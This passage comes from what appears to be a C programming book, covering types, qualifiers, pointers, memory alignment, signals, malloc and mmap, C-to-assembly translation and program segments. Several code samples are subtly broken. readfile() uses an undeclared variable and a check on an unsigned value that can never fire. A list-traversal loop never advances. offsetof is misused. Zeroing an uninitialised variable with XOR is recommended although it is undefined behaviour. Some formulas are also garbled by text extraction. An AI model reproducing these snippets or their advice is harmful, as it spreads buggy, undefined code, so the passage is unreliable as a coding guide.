postfix integral values properly, e.g. typically with ULL or UL for 64-bit words.
3.2.2 Fast Types
The types listed here are defined in <stdint.h>
The C99 standard states these types to be specified for the fastest machine-types capa-
ble of presenting given-size values. The types below are optional.
3.3. OTHER TYPES 33
Unsigned Signed
uint_fast8_t int_fast8_t
uint_fast16_t int_fast16_t
uint_fast32_t int_fast32_t
uint_fast64_t int_fast64_t
The numbers in the type names express the desired width of values to be represented
in bits.
3.2.3 Least-Width Types
The types listed here are defined in <stdint.h>
The C99 standard states these types to be specified for the minimum- size types capable
of presenting given-size values. These types are optional.
Unsigned Signed
uint_least8_t int_least8_t
uint_least16_t int_least16_t
uint_least32_t int_least32_t
uint_least64_t int_least64_t
The numbers in the type names express the desired width of values to be represented
in bits.
3.3 Other Types
This section introduces common types; some of them are not parts of any C standards,
but it might still help to know about them.
Memory-Related
size_t is used to specify sizes of memory objects in bytes. Note that some older systems
are said to define this to be a signed type, which may lead to erroneous behavior.
ssize_t is a signed type used to represent object sizes; it’s typically the return type for
read() andwrite() .
ptrdiff_t is defined to be capable of storing the difference of two pointer values.
intptr_t anduintptr_t are, respectively, signed and unsigned integral types defined
to be capable of storing numeric pointer values. These types are handy if you do
arithmetics beyond addition and subtraction on pointer values.
File Offsets
off_t is used to store and pass around file-offset arguments. The type is signed to allow
returning negative values to indicate errors. Traditionally, off_t was 32-bit, which lead
to trouble with large files (of 231or more bytes). As salvation, most systems let you
activate 64-bit off_t if it’s not the default; following is a list of a few possible macros
to do it at compile-time.
34 CHAPTER 3. C TYPES
#define _FILE_OFFSET_BITS 64
#define _LARGEFILE_SOURCE 1
#define _LARGE_FILES 1
Alternatively, with the GNU C Compiler, you could compile with something like
gcc -D_FILE_OFFSET_BITS=64 -o proggy proggy.c
3.4 Wide-Character Types
/*TODO : write on these */
wchar_t
wint_t
3.5 Aggregate Types
struct and union
Structures and unions are called aggregates. Note that even though it’s possible to de-
clare functions that return aggregates, it often involves copying memory and therefore,
should usually be avoided; if this is the case, use pointers instead. Some systems pass
small structures by loading all member values into registers; here it might be faster to
call pass by value with structures. This is reportedly true for 64-bit PC computers.
Aggregates nest; it’s possible to have structs and unions inside structs.
To avoid making your structs unnecessarily big, it’s often a good idea to group bitfields
together instead of scattering them all over the place. It might also be good to organise
the biggest-size members first, paying attention to keeping related data fields together;
this way, there’s a bigger chance of fetching several ones from memory in a single
[cacheline] read operation. This also lets possible alignment requirements lead to using
fewer padding bytes.
Compilers such as the GNU C Compiler - GCC - allow one to specify structures to be
packed. Pay attention to how you group items; try to align each to a boundary of its
own size to speed read and write operations up. This alignment is a necessity on many
systems and not following it may have critical impact on runtime on systems which
don’t require it.
Use of global variables is often a bad idea, but when you do need them, it’s a good idea
to group them inside structs; this way, you will have fewer identifier names polluting
the name space.
3.5.1 Structures
struct is used to declare combinations of related members.
3.5. AGGREGATE TYPES 35
3.5.1.1 Examples
struct Example
struct list {
struct listitem *head;
struct listitem *tail;
};
declares a structure with 2 pointers, whereas
Second Example
struct listitem {
unsigned long val;
struct listitem *prev;
struct listitem *next;
};
declares a structure with two [pointer] members and a value member; these could be
useful for [bidirectional] linked-list implementations.
Structure members are accessed with the operators . and -> in the following way:
struct list list;
/* assign something to list members */
/* list is struct */
struct listitem *item = list.head;
struct listitem *next;
while (item) {
next = item->next; /* item is pointer */
}
3.5.2 Unions
union Example
union is used to declare aggregates capable of holding one of the specified members at
a time. For example,
union {
long lval;
int ival;
};
can have ival set, but setting lval may erase its value. The . and -> operators apply for
unions and union-pointers just like they do for structures and structure-pointers.
36 CHAPTER 3. C TYPES
3.5.3 Bitfields
Bitfield Example
Bitfields can be used to specify bitmasks of desired widths. For example,
struct bitfield {
unsigned mask1 : 15;
unsigned mask2 : 17;
}
declares a bitfield with 15- and 17-bit members. Padding bits may be added in-between
mask1 and mask2 to make things align in memory suitably for the platform. Use your
compiler’s pack-attribute to avoid this behavior.
Portability
Note that bitfields used to be a portability issue (not present or good on all systems).
They still pose issues if not used with care; if you communicate bitfields across plat-
forms or in files, be prepared to deal with bit- and byte-order considerations.
3.6 Arrays
Let’s take a very quick look on how to declare arrays. As this is really basic C, I will
only explain a 3-dimensional array in terms of how its members are located in memory.
3.6.1 Example
3-Dimensional Example
int tab[8][4][2];
would declare an array which is, in practice, a flat memory region of 8 4 2 sizeo f (int );
64 ints, that is. Now
tab[0][0][0]
would point to the very first int in that table,
tab[0][0][1]
to the int value right next to it (address-wise),
tab[7][1][0]
to the int at offset
(7 4 2 +1 4 +0 2 ) =60, i.e. the 59th int in the table.
Here is a very little example program to initialise a table with linearly growing values.
#include <stdio.h>
int
main(int argc, char *argv[])
3.7. TYPEDEF 37
{
int tab[8][4][2];
int i, j, k, ndx = 0;
for (i = 0 ; i < 8 ; i++) {
for (j = 0 ; j < 4 ; j++) {
for (k = 0 ; k < 2 ; k++) {
tab[i][j][k] = ndx++;
}
}
}
}
One thing to notice here is that using index (orrindex ) as an identifier name is a bad
idea because many UNIX systems define them as macros; I use ndx instead of index .
3.7 typedef
C lets one define aliases for new types in terms of existing ones.
3.7.1 Examples
typedef Example
Note that whereas I am using an uninitialised value of w, which is undefined, the value
doesn’t matter as any value’s logical XOR with itself is zero. This is theoretically faster
than explicit assignment of 0; the instruction XOR doesn’t need to pack a zero-word
into the instruction, and therefore the CPU can prefetch more adjacent bytes for better
pipeline parallelism.
typedef long word_t; /* define word_t to long */
word_t w;
w ^= w; /* set w to 0 (zero). */
would define word_t to be analogous to long. This could be useful, for example, when
implementing a C standard library. Given that LONG_SIZE is defined somewhere, one
could do something like
#if (LONG_SIZE == 4)
typedef long uint32_t;
#elif (LONG_SIZE == 8)
typedef long uint64_t;
#else
#error LONG_SIZE not set.
#endif
There would be other declarations for <stdint.h> , but those are beyond the scope of
this section.
38 CHAPTER 3. C TYPES
3.8 sizeof
Thesizeof operator lets you compute object sizes at compile-time, except for variable-
length arrays.
3.8.1 Example
Zeroing Memory
You can initialise a structure to all zero-bits with
#include <stat.h>
struct stat statbuf = { 0 };
Note that sizeof returns object sizes in bytes.
3.9 offsetof
C99 Operator
ISO C99 added a handy new operator, offsetof. You can use it to compute offsets of
members in structs and unions at compile-time.
3.9.1 Example
offsetof Example
Consider the following piece of code
#include <stat.h>
size_t szofs;
struct stat statbuf;
szofs = offsetof(statbuf, st_size);
This most likely useless bit of code computes the offset of the st_size field from the
beginning of the struct statbuf . Chances are you don’t need this kind of information
unless you’re playing with C library internals.
3.10. QUALIFIERS AND STORAGE CLASS SPECIFIERS 39
3.10 Qualifiers and Storage Class Specifiers
3.10.1 const
Theconst qualifier is used to declare read-only data, which cannot be changed using
the identifier given. For example, the prototype of strncpy()
const Example
char *strncpy(char *dest, const char *src, size_t n);
states that src is a pointer to a string whose data strncpy() is not allowed to change.
On the other hand, the declaration
Another Example
char *const str;
means that str is a constant pointer to a character, whereas
char const *str;
would be a pointer to a constant character.
It may help you to better understand constant qualifiers by reading them right to left.
3.10.2 static
File Scope
Global identfiers (functions and variables) declared with the static specifier are only
visible within a file they are declared in. This may let the compiler optimise the code
better as it knows there will be no access to the entities from other files.
Function Scope
Thestatic qualifier, when used with automatic (internal to a function) variables, means
that the value is saved across calls, i.e. allocated somewhere other than the stack.
In practice, you probably want to initialise such variables when declaring them. For
example,
static Example
#define INIT_SUCCESS 0
#include <pthread.h>
pthread_mutex_t initmtx = PTHREAD_MUTEX_INITIALIZER;
void
proginit(int argc, char *argv[])
{
static volatile int initialised = 0;
40 CHAPTER 3. C TYPES
/* only run once */
pthread_mutex_lock(&initmtx);
if (initialised) {
pthread_mutex_unlock(&initmtx);
return;
}
/* critical region begins */
if (!initialised) {
/* initialise program state */
initialised = 1;
}
/* critical region ends */
pthread_mutex_unlock(&initmtx);
return;
}
Comments
The listing shows a bit more than the use of the static qualifier; it includes a critical
region , for which we guarantee single-thread-at-once access by protecting access to
the code with a mutex (mutual exclusion lock).
3.10.3 extern
The extern specifier let’s you introduce entities in other files. It’s often a good idea
to avoid totally-global functions and variables; instead of putting the prototypes into
global header files, if you declare
#include <stdint.h>
uintptr_t baseadr = 0xfe000000;
void
kmapvirt(uintptr_t phys, size_t nbphys)
{
/* FUNCTION BODY HERE */
}
in a source file and don’t want to make baseadr (if you need to use it from other files,
it might be better if not) and kmapvirt() global, you can do this in other files
#include <stdint.h>
extern uintptr_t baseadr;
extern void kmapvirt(uintptr_t, size_t);
3.11. TYPE CASTS 41
Note that you don’t need argument names for function prototypes; the types are neces-
sary for compiler checks (even though it may not be required).
3.10.4 volatile
Usage
You should declare variables that may be accessed from signal handlers or several
threads with the volatile specifier to make the compiler check the value every time it is
used (and eliminate assumptions by the optimiser that might break such code).
3.10.5 register
Usage
The register storage specifier is used to make the compiler reserve a register for a
variable for its whole scope. Usually, it’s better to trust the compiler’s register allocator
for managing registers
3.11 Type Casts
Possible Bottleneck
With integral types, casts are mostly necessary when casting a value to a smaller-width
type. If you’re concerned about code speed, pay attention to what you’re doing; prac-
tice has shown that almost-innocent looking typecasts may cause quite hefty perfor-
mance bottlenecks, especially in those tight inner loops. Sometimes, when making
size assumptions on type, casts may actually break your code.
Sometimes it’s necessary to cast pointers to different ones. For example,
((uintptr_t)u8ptr - (uintptr_t)u32ptr)
would evaluate to the distance between *u8ptr and *u32ptr in bytes. Note that the
example assumes that
(uintptr_t)u8ptr > (uintptr_t)u32ptr
More on pointers and pointer arithmetics in the following chapter.
42 CHAPTER 3. C TYPES
Chapter 4
Pointers
In practice, C pointers are memory addresses. One of the interesting things about C is
that it allows access to pointers as numeric values, which lets one do quite ’creative’
things with them. Note that when used as values, arrays decay to pointers to their first
element; arrays are by no means identical to pointers.
4.1 void Pointers
void * vs. char *
ISO C defines void pointers, void * , to be able to assign any pointer to and from without
explicit typecasts. Therefore, they make a good type for function arguments. Older C
programs typically use char * as a generic pointer type.
It’s worth mentioning that one cannot do arithmetic operations on void pointers directly.
4.2 Pointer Basics
Basic Examples
As an example, a pointer to values of type intis declared like
int *iptr;
You can access the value at the address iptr like
i = *iptr;
and the two consecutive integers right after the address iptr like
i1 = iptr[1];
i2 = iptr[2];
To make iptr point to iptr[1], do
iptr++;
43
44 CHAPTER 4. POINTERS
or
iptr = &iptr[1];
4.3 Pointer Arithmetics
The C Language supports scaled addition and subtraction of pointer values.
To make iptr point to iptr[1], you can do
iptr++; // point to next item; scaled addition
or
iptr += 1;
Similarly, e.g. to scan an array backwards, you can do
iptr--;
to make iptr point to iptr[-1], i.e. the value right before the address iptr.
To compute the distance [in given-type units] between the two pointer addresses iptr1
and iptr2, you can do
diff = iptr2 - iptr1;
Note that the result is scaled so that you get the distance in given units instead of what
(intptr_t)iptr2 - (intptr_t)iptr1;
would result to. The latter is mostly useful in advanced programming to compute the
difference of the pointers in bytes.
If you don’t absolutely need negative values, it is better to use
(uintptr_t)iptr2 - (uintptr_t)iptr1; // iptr2 > iptr1
or things will get weird once you get a negative result (it is going to end up equivalent to
a big positive value, but more on this in the sections discussing numerical presentation
of integral values. Note, though, that this kind of use of the C language may hurt
the maintainability and readability of code, which may be an issue especially on team
projects.
It is noteworthy that C pointer arithmetics works on table and aggregate ( struct and
union ) pointers as well. It’s the compiler (and sometimes CPU) who scale the arith-
metics of operations such as ++to work properly.
4.4 Object Size
Memory
Pointer types indicate the size of memory objects they point to. For example,
uint32_t u32 = *ptr32;
4.4. OBJECT SIZE 45
reads a 32-bit [unsigned] value at address ptr32 in memory and assigns it to u32.
Results of arithmetic operations on pointers are scaled to take object size in account.
Therefore, it’s crucial to use proper pointer types [or cast to proper types] when access-
ing memory.
uint32_t *u32ptr1 = &u32;
uint32_t *u32ptr2 = u32ptr1 + 1;
makes u32ptr2 point to the uint32_t value right next to u32 in memory.
In C, any pointer [value] can be assigned to and from void * without having to do
type-casts. For example,
void *ptr = &u32;
uint8_t *u8ptr = ptr;
uint8_t u8 = 0xff;
u8ptr[0] = u8ptr[1] = u8ptr[2] = u8ptr[3] = u8;
would set all bytes in u32 to 0xff (255). Note that doing it this way is better than
size_t n = sizeof(uint32_t);
while (n--) {
*u8ptr++ = u8;
}
both because it avoids loop overhead and data-dependencies on the value of u8ptr, i.e.
the [address of] next memory address doesn’t depend on the previous operation on the
pointer.
46 CHAPTER 4. POINTERS
Chapter 5
Logical Operations
5.1 C Operators
TODO - had some LaTeX-messups, will fix later. :)
5.1.1 AND
Truth Table
The logical function AND is true when both of its arguments are. The truth table
becomes
Bit #1 Bit #2 AND
0 0 0
0 1 0
1 0 0
1 1 1
5.1.2 OR
Truth Table
The logical function OR is true when one or both of its arguments are. Some people
suggest OR should rather be called inclusive OR .
The truth table for OR is represented as
Bit #1 Bit #2 OR
0 0 0
0 1 1
1 0 1
1 1 1
47
48 CHAPTER 5. LOGICAL OPERATIONS
5.1.3 XOR
Truth Table
The logical function XOR, exclusive OR, is true when exactly one of its arguments is
true (1).
The truth table of XOR is
Bit #1 Bit #2 XOR
0 0 0
0 1 1
1 0 1
1 1 0
5.1.4 NOT
Truth Table
The logical function NOT is true when its argument is false.
Bit NOT
0 1
1 0
5.1.5 Complement
Complementing a value means turning its 0-bits to ones and 1-bits to zeroes; ’reversing’
them.
Bit Complement
0 1
1 0
Chapter 6
Memory
Table of Bytes
C language has a thin memory abstraction. Put short, you can think of memory as a flat
table/series of bytes which appears linear thanks to operating system virtual memory.
6.1 Alignment
Many processors will raise an exception if you try to access unaligned memory ad-
dresses [using pointers], and even on the ones which allow it, it tends to be much
slower than aligned access. The address addr is said to be aligned to n-byte boundary
if
(adr % n) == 0 /* modulus with n is zero, */
i.e. when adr is a multiple of n.
It’s worth mentioning that if you need to make sure the pointer ptr is aligned to a
boundary of p2, where p2 is a power of two, it’s faster to check that
/* low bits zero. */
#define aligned(ptr, p2) \
(!((uintptr_t)ptr & ((p2) - 1)))
The type uintptr_t is defined to one capable of holding a pointer value in the ISO/ANSI
C99 standard header <stdint.h> .
6.2 Word Access
Whereas the most trivial/obvious implementations of many tasks would access memory
a byte at a time, for example
nleft = n >> 2;
n -= nleft << 2;
49
50 CHAPTER 6. MEMORY
/* unroll loop by 4; set 4 bytes per iteration. */
while (nleft--) {
*u8ptr++ = u8;
*u8ptr++ = u8;
*u8ptr++ = u8;
*u8ptr++ = u8;
}
/* set the rest of bytes one by one */
while (n--) {
*u8ptr++ = u8;
}
it’s better to do something like
n32 = n >> 2; /* n / 4 */
u32 = u8; /* u8 */
u32 |= u32 << 8; /* (u8 << 8) | u8 */
u32 |= u32 << 16; /* (u8 << 24) | (u8 << 16) | (u8 << 8) | u8 */
/* set 32 bits at a time. */
while (n32--) {
*u32ptr++ = u32;
}
or even
n32 = n >> 4; /* n / 16 */
u32 = u8; /* u8 */
u32 |= u32 << 8; /* (u8 << 8) | u8 */
u32 |= u32 << 16; /* (u8 << 24) | (u8 << 16) | (u8 << 8) | u8 */
/*
* NOTE: x86 probably packs the indices as 8-bit immediates
* - eliminates data dependency on previous pointer value
* present when *u32ptr++ is used
*/
for (i = 0 ; i < n32 ; i++) {
u32ptr[0] = u32;
u32ptr[1] = u32;
u32ptr[2] = u32;
u32ptr[3] = u32;
u32ptr += 4;
}
in order to access memory a [32-bit] word at a time. On a typical CPU, this would
be much faster than byte-access! Note, though, that this example is simplified; it’s
assumed that u32ptr is aligned to 4-byte/32-bit boundary and that n is a multiple of 4.
We’ll see how to solve this using Duff’s device later on in this book.
The point of this section was just to demonstrate [the importance of] word-size mem-
ory access ; the interesting thing is that this is not the whole story about implementing
fast memset() in C; in fact, there’s a bunch of more tricks, some with bigger gains than
others, to it. We shall explore these in the part Code Optimisation of this book.
Chapter 7
System Interface
7.1 Signals
Brief
Signals are a simple form of IPC (Inter-Process Communications). They are asyn-
chronous events used to notify processes of conditions such as arithmetic (SIGFPE,
zero-division) and memory access (SIGSEGV , SIGBUS) errors during program execu-
tion. Asynchronous means signals may be triggered at any point during the execution of
a process. On a typical system, two signals exist for user-defined behavior; SIGUSR1
and SIGUSR2. These can be used as a rough form of communications between pro-
cesses.
System
Most signal-handling is specific to the host operating system, but due to its widespread
use, I will demonstrate UNIX/POSIX signals as well as some simple macro techniques
by representing a partial implementation of <signal.h> . I will not touch the differences
of older signal() and sigaction() here; that belongs to system programming books. As
such a book, Advanced Programming in the UNIX Environment by late Richard
W. Stevens is a good text on the topic.
Asynchronosity
It is noteworthy that signal handlers can be triggered at any time; take care to declare
variables accessed from them volatile and/or protect them with lock-mechanisms such
as mutexes. C has a standard type, sig_atomic_t , for variables whose values can be
changed in one machine instruction (atomically).
Critical Regions
I will touch the concept of critical regions quickly. A critical region is a piece of code
which may be accessed several times at once from different locations (signal handlers
or multiple threads). Need arises to protect the program’s data structures not to corrupt
them by conflicting manipulation (such as linked lists having their head point to wrong
item). At this point, it’s beyond our interest to discuss how to protect critical regions
51
52 CHAPTER 7. SYSTEM INTERFACE
beyond using mutexes that are locked when the region is entered, unlocked when left
(so as to serialise access to those regions).
Signal Stack
On many UNIX systems, you can set signals to be handled on a separate stack, typically
with sigaltstack() .
SIGCLD is not SIGCHLD
There is a bit of variation in how signals work on different systems, mostly about which
signals are available. This seems mostly irrelevant today, but I’ll make one note; the old
System V SIGCLD has semantics different from SIGCHLD, so don’t mix them (one
sometimes sees people redefine SIGCLD as SIGCHLD which should not be done).
7.2 Dynamic Memory
malloc() and Friends
Standard C Library provides a way to manage dynamic memory with the functions
malloc(), calloc(), realloc() and free(). As we are going to see in our allocator source
code, there’s a bunch of other related functions people have developed during the last
couple of decades, but I will not get deeper into that here.
Dynamic allocation is a way to ask the system for memory for a given task; say you
want to read in a file (for the sake of simplicity, the whole contents of the file). Here’s
a possible way to do it on a typical UNIX system.
readfile()
#include <stdlib.h>
#include <errno.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <unistd.h>
#include <fcntl.h>
void *
readfile(char *filename, size_t *sizeret)
{
void *buf = NULL;
struct stat statbuf;
size_t nread;
size_t nleft;
int fd;
if (sizeret) {
*sizeret = 0;
}
if (stat(filename, &statbuf) < 0) {
return NULL;
7.2. DYNAMIC MEMORY 53
}
if (!S_ISREG(statbuf.st_mode)) {
return NULL;
}
fd = open(name, O_RDONLY);
if (fd < 0) {
return NULL;
}
nread = 0;
nleft = statbuf.st_size;
if (nleft) {
buf = malloc(nleft);
if (buf) {
while (nleft) {
nread = read(fd, buf, nleft);
if (nread < 0) {
if (errno == EINTR) {
continue;
} else {
free(buf);
return NULL;
}
} else {
nleft -= nread;
}
}
if (sizeret) {
*sizeret = statbuf.st_size;
}
}
}
close(fd);
return buf;
}
EINTR
to read the file into the just-allocated buffer. Notice how we deal with UNIX-style
interrupted system calls by checking the value of errno against EINTR; should it occur
that a read system call is interrupted, we’ll just continue the loop to read more.
An implementation of malloc() and other related functions is presented later in this
book.
54 CHAPTER 7. SYSTEM INTERFACE
7.2.1 Heap
sbrk() and brk()
Heap segment is where the traditional albeit POSIX-undefined brk() (kernel) and sbrk()
(C library) dynamic memory interface operates. Note that sbrk() is merely a wrapper
to a [simple] brk system call .
sbrk() not in POSIX
Back in the old days, dynamic memory was implemented with the brk() system call
(often using the sbrk() standard library wrapper). All it really does is adjust the offset
of the top of the heap. This seems to be recognised as a somewhat too rudimentary or
dated hack by POSIX; they have deliberately excluded sbrk() from their standard. Note
that this doesn’t mean sbrk() would not be available on your system; it most likely is.
sbrk() + mmap()
In reality, malloc-allocators today use only mmap() or a mix of mmap() and sbrk(). It’s
a compromise between speed and ease of use, mostly (the kernel does the book-keeping
for mmap() and it tends to be thread-safe, i.e. reentrant, too).
7.2.2 Mapped Memory
Files
Modern allocators use mmap() + munmap() [from POSIX] to manage some of their
allocations. The C library provides an interface for this as a special case of mapping
files; files can be memory-mapped, giving us a fast way to write and read data to and
from file-systems. The special case is to allocate zeroed regions not belonging to files.
Anonymous Maps
As a detail, mmap() can often be used to allocate anonymous (zeroed) memory. I know
of two strategies to how to implement this; map /dev/zero or use the MAP_ANON flag.
Chapter 8
C Analogous to Assembly
8.1 ’Pseudo-Assembly’
Some of us call C pseudo-assembly. C is very close to the machine and most if not all
machine language dialects have a bunch of instructions to facilitate fast implementation
of C code execution. This is probably not a coincidence.
In this chapter, I shall try to explain the elegant simplicity of C as well as its close rela-
tionship with the machine; keep in mind assembly is just symbolic machine language.
Hence assembly makes a great tool for explaining how C code utilises the machine.
Here is a simple mapping of common C operations to pseudo-machine instructions.
8.1.1 Pseudo Instructions
Hypothetical Instructions
C Operation Mnemonic
& AND
| OR
^ XOR
 ̃ NOT
++ INC
– DEC
+ ADD
- SUB
* MUL, IMUL
/ DIV , IDIV
% MOD
Conditional Jumps
55
56 CHAPTER 8. C ANALOGOUS TO ASSEMBLY
C Comparison Test Brief
N/A JMP Jump Unconditionally
! JZ Jump if Zero
(x) JNZ Jump if Not Zero
< JLT Jump if Less Than
<= JLTE Jump if Less Than or Equal
> JGT Jump if Greater Than
>= JGTE Jump if Greater Than or Equal
8.2 Addressing Memory
Pointer Operations
C Syntax Function
* dereference pointer
& get object address/pointer
[] access member of array or bitfield using index
. access member of struct or union
-> access member of struct or union using pointer
variable value in register or memory
array contiguous region of memory
constant register or immediate (in-opcode) values
8.3 C to Assembly/Machine Translation
Here we shall take a look at how C code is translated to assembly by a hypothetical
compiler. I will also make notes on some things one can do to speed code up.
Note that in this section, I mix variable names and register names in the pseudo-
assembly code; in real life, this would mean memory locations and registers, but better
code would be based purely on using registers. I chose this convention for the sake of
readability. Some examples actually do use registers only for a bit closer touch to the
real machine.
8.3.1 Branches
8.3.1.1 if - else if - else
It pays to put the most likely test cases first. CPUs do have branch prediction logic, but
they still need to fetch code and jump around in it, which defeits their internal execution
pipelines and consumes cache memory.
Let’s see what’s going on in a piece of C code; I will use pseudo-code in a form similar
to C and assembly to explain how this code could be translated at machine level.
C Code
8.3. C TO ASSEMBLY/MACHINE TRANSLATION 57
#1: if (a < b) {
;
#2: } else if (b < c && b > d) {
;
#3: } else if (c > a || d <= a) {
;
#4: } else {
;
#5: }
Now let’s look at what’s going on under the hood.
Pseudo Code
CMP a, b ; line #1
JGE step2 ; branch to step2 if !(a < b)
/* code between #1 and #2 */
JMP done
step2:
CMP b, c ; line #2
JGE step3 ; branch to step3 if !(b < c)
CMP b, d ; line #2
JLE step3 ; branch to step3 if !(b > d)
/* code between #2 and #3 */
JMP done
step3:
CMP c, a ; line #3
JLT step4 ; branch to step4 if !(c > a)
CMP d, a ; #line 3
JGT step4 ; brach to step4 if !(d <= a)
/* code between #3 and #4 */
JMP done
step4:
/* code between #4 and #5 */
done: ; done
8.3.1.2 switch
One useful way to replace switch statements with relatively small sets of integral keys
is to use function pointer tables indexed with key values. The construct
switch (a) {
case 0:
58 CHAPTER 8. C ANALOGOUS TO ASSEMBLY
a++;
break;
case 1:
a += b;
break;
default:
break;
}
could be translated to
TEST a ; set flags
JZ label0 ; branch to label0 if (a == 0)
CMP a, $1 ; compare a and 1
JE label1 ; branch to label1 if equal
JMP done ; default; jump over switch
label0:
INC a ; a++;
JMP done ; done
label1:
ADD b, a ; a += b;
done: ; done
This should often be faster than if- else if - else with several test conditionals. With
suitable case values (small integrals), a good compiler might know how to convert this
construct to a jump table; check the value of a and jump to a location indexed by it.
8.3.2 Loops
8.3.2.1 for
The C snippet
long *tab = dest;
for (i = 0 ; i < n ; i++) {
tab[i] = 0;
}
could be translated as
MOV $0, %EAX ; i = 0;
loop:
CMP %EAX,n ; compare i and n
JE done ; done if (i == n)
MOV $0, %EAX(tab, 4) ; tab[i] = 0; scale i by 4
INC %EAX ; i++;
JMP loop ; iterate
done:
8.3. C TO ASSEMBLY/MACHINE TRANSLATION 59
Note that I used a register for loop counter to speed things up, even though I have
mixed variables and registers in the pseudo-code freely. This is more likely what a
real compiler would do. Some architectures also have prethought looping instructions
which might use a specified register for the loop counter, for example. IA-32 has REP-
functionality.
Indexed Scaled Addressing
The line
MOV $0, %EAX(tab, 4); tab[i] = 0;
means “move 0 to the location at tab + %EAX * 4, i.e. i (%EAX) is scaled by 4, i.e.
sizeof(long) on 32-bit architecture.
8.3.2.2 while
The C loop construct
int i = NBPG >> 2;
long *tab = dest;
while (i--) {
*tab++ = 0;
}
Could work (with 4-byte longs) as
MOV tab, %EAX ; move address to register
MOV $NBPG, %EBX ; move NBPG to register (i)
SHR $2, %EBX ; shift NBPG right by 2
loop:
TEST %EBX
JZ done
DEC %EBX
MOV $0, *%EAX
ADD $4, %EAX
JMP loop
done:
In this example, I used registers to contain the memory address and loop counter to
speed the code up.
8.3.2.3 do-while
The difference between while and do-while is that do-while always iterates the body of
the loop at least once.
The C code
int i = NBPG >> 2;
long *tab = dest;
60 CHAPTER 8. C ANALOGOUS TO ASSEMBLY
do {
*tab++ = 0;
} while (--i);
can be thought of as
MOV tab, %EAX
MOV NBPG, %EBX
SHR $2, %EBX
loop:
MOV $0, *%EAX
ADD $4, %EAX
DEC %EBX
TEST %EBX
JNZ loop
done:
In this example, I allocated registers for all variables like a good compiler should do.
8.3.3 Function Calls
Function call mechanisms used by C are explained in detail in the chapter C Run
Model in this book.
For now, suffice it to illustrate the i386 calling convention quickly.
A function call of
foo(1, 2, 3);
int foo(int arg1, int arg2, int arg3) {
return (arg1 + arg2 + arg3);
}
Can be thought of as
Pseudo Code
/* function call prologue */
PUSH $3 ; push arguments in reverse order
PUSH $2
PUSH $1
PUSH %EIP ; push instruction pointer
PUSH %EBP ; current frame pointer
MOV %EBP, %ESP ; set stack pointer
JMP foo
/* stack
* -----
* arg3
* arg2
* arg1
* retadr
8.3. C TO ASSEMBLY/MACHINE TRANSLATION 61
* prevfp; <- %ESP and %EBP point here
*/
foo:
MOV 8(%ESP), %EAX
MOV 12(%ESP), %EBX
MOV 16(%ESP, %ECX
ADD %EBX, %EAX
ADD %ECX, %EAX ; return value in EAX
MOV %EBP, %ESP ; return frame
/* return from function */
POP %EBP ; pop old frame pointer
POP %EBX ; pop old EIP value
MOV %EBP, %ESP ; set stack pointer to old frame
JMP *%EBX ; jump back to caller
Notes
foo() doesn’t have internal variables, so we don’t need to adjust stack pointer [or push
values] on entry to and at leaving the function.
Call Conventions
Usually, CPUs have specific instructions to construct call frames as well as return from
functions. It was done here by hand to demonstrate the actions involved.
62 CHAPTER 8. C ANALOGOUS TO ASSEMBLY
Chapter 9
C Run Model
C is a low-level language. As such, it doesn’t assume much from the host operating
system and other support software. The language and its run model are elegant and
simple. C is powerful for low-level software development; situations where you really
have to write assembly-code are rare and few, yet C gives one a close interface to low-
level machine facilities with reasonable portability to different hardware platforms.
Stack, Memory, Registers
In short, C code execution is typically based on values stored on the stack, elsewhere
in memory, and machine registers. Note, however, that stack as well as heaps are not
language features, but rather details of [typical] implementations.
Stack is allocated from process virtual memory and from physical memory as dictated
by the kernel and page-daemon. Other than move data to registers, there’s little you
can do to affect stack operation with your code.
Memory is anything from the lowest-level (closest-to-CPU) cache to main physical
memory. Utilising caches well tends to pay back in code speed. For one thing, it’s
good to keep related data on as few cachelines [and pages] as possible.
Registers are the fastest-access way to store and move data around in a computer. All
critical variables such as loop counters should have registers allocated for them. It’s
noteworthy to avoid the C keyword register , as that is said to allocate a register for the
whole lifetime/scope of the function and is therefore to be considered wasteful. Note,
however, that as per C99, the specifier register is only a suggestion “that access to the
obejct should be as fast as possible.”
Use of the register-specifier may be helpful in situations where few or no compiler op-
timisations are in effect; on the other hand, it is noteworthy that compiler optimisations
often make debugging hard if not impossible.
63
64 CHAPTER 9. C RUN MODEL
9.1 Code Execution
9.1.1 Program Segments
Code and Data
I will provide a somewhat-simplified, generalised view to how UNIX systems organise
program execution into a few segments.
STACK execution data, function interface
DYN mapped regions
BSS runtime data; allocated; zeroed; heap
DATA initialised data
RODATA read-only data
TEXT program code
9.1.1.1 Minimum Segmentation
Here I describe a minimal set of i386 memory segments
Flat Memory Model
Use one text segment (can be the same for TEXT and RODATA ).
Use one read-write data segment (for DATA, BSS, and DYN segments.
Use one read-write, expand-down data segment for STACK segment.
This flat model is useful for, e.g., kernel development . Most other programmers don’t
need to be concerned about segmentation.
9.1.2 TEXT Segment
Program Code
The TEXT segment contains program code and should most of the time be set to read-
only operation to avoid code mutations as well as tampering with process code (for
exploits and other malware as an example).
9.1.3 RODATA Segment
Read-Only Data
Storage for items such as initialised constant variables and perhaps string literals (better
not try to overwrite them). Read-only data segment.
9.1. CODE EXECUTION 65
9.1.4 DATA Segment
Initialised Data
Storage mostly for initialised global entities and probably static variables. Can be both
read and written.
9.1.5 BSS Segment
Allocated Data
The name of the BSS Segment originates from PDP-assembly and stood for Block
Started by Symbol. This is where runtime-allocated data structures i.e. uninitialised
global structures [outside C functions] are reserved. This is also where dynamic mem-
ory allocation (malloc(), calloc()) takes place if you use the traditional system library
wrapper sbrk() to set so-called program break. In practice, the break is a pointer to the
byte right after the current top of heap. This segment should be filled with zero bytes
at program load time.
Zeroed Memory
Note that when new physical pages are mapped to virtual space of user processes, it
needs to be zeroed not to accidentally slip confidential data such as, in one of the worst
cases, uncrypted passwords. This task is frequently done to freed/unmapped pages by
system kernels .
9.1.6 DYN Segment
Mapped Regions
The implementation details vary system to system, but this segment’s purpose here is
to emphasize the usage of mmap() to map zeroed memory. This could be facilitated by
having the heap ( BSS) live low in memory and DYN far above it to minimalise the risk
of the segments overrunning each other. I plan to try to put this segment right below
stack and make it start mapping memory from the top in my kernel project.
9.1.7 STACK Segment
Routines & Variables
The stack is a region of memory, usually in the high part of the virtual address space
(high memory addresses). Conventionally, the segment ’grows down’, i.e. values are
pushed into memory and the stack pointer decremented instead of the common linear
order memory access where pointers are incremented and dereferenced with linearly
growing addresses. This allows the stack to be located high and work in concert with
dynamic memory segments lower in address space (the heap grows upwards, address-
wise; mapped regions may be located under the stack).
The stack exists to implement function call interface, automatic variables and other
